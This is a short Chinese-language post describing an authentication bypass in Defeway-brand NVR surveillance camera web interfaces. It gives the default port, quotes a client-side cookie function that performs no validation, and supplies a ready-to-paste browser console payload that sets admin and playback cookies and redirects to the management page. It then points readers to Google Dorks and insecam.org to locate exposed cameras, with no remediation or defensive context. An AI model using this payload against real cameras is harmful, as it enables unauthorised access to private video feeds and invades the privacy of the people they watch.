如標題所示,某些監控攝像頭的型號可以在沒有密碼的情況下訪問(管理員訪問)。
易受攻擊的模型有很多。我們可以舉例提到品牌 Defeway。漏洞來自嵌入式系統,更確切地說,是來自網頁伺服器及其認證系統。
這些攝影機可以通過其網頁介面識別,該介面看起來像這樣:
NVR 相機視頻客戶端網頁介面連接
供您參考,預設端口是 60001.
要訪問管理介面,只需調用位於 /js/cookie.js 中的 javascript 函數: login t_set();
這是他的代碼:
function login\_set(usr,pwd,iSetAble,iPlayBack){ pwd = !pwd ? 'null' : pwd; Cookies.set("dvr\_usr", usr); Cookies.set("dvr\_pwd", pwd); Cookies.set("iSetAble", iSetAble); Cookies.set("iPlayBack", iPlayBack); }
您會注意到,該功能並不負責驗證數據。它只是寫入4個cookie,並使用提供給它的數據。
在這些數據中:
- dvr_usr: 使用者名稱: « admin » 為預設值,但其他值也可以使用。
- dvr_pwd: 完全虛構的密碼,我們不在乎。
- iSetAble: 1 代表管理員
- iPlayBack: 1 以便能夠觀看視頻流
一旦進入身份驗證頁面,我們打開開發者控制台或JavaScript(在大多數瀏覽器中按F12)。然後我們插入以下代碼:
login_set('admin','被盜',1,1);document.location="/view2.html";
第一行創建身份驗證的 cookies,第二行將您重定向到管理頁面。對於第一行,我們也可以這樣做:
login_set(1,1,1,1);
然後在地址欄中輸入 : http://ip target:port/view2.html
執行身份驗證腳本…
顯示管理頁面完成後...
您可以透過「Google Dorks」或直接透過 insecam.org 找到這些攝影機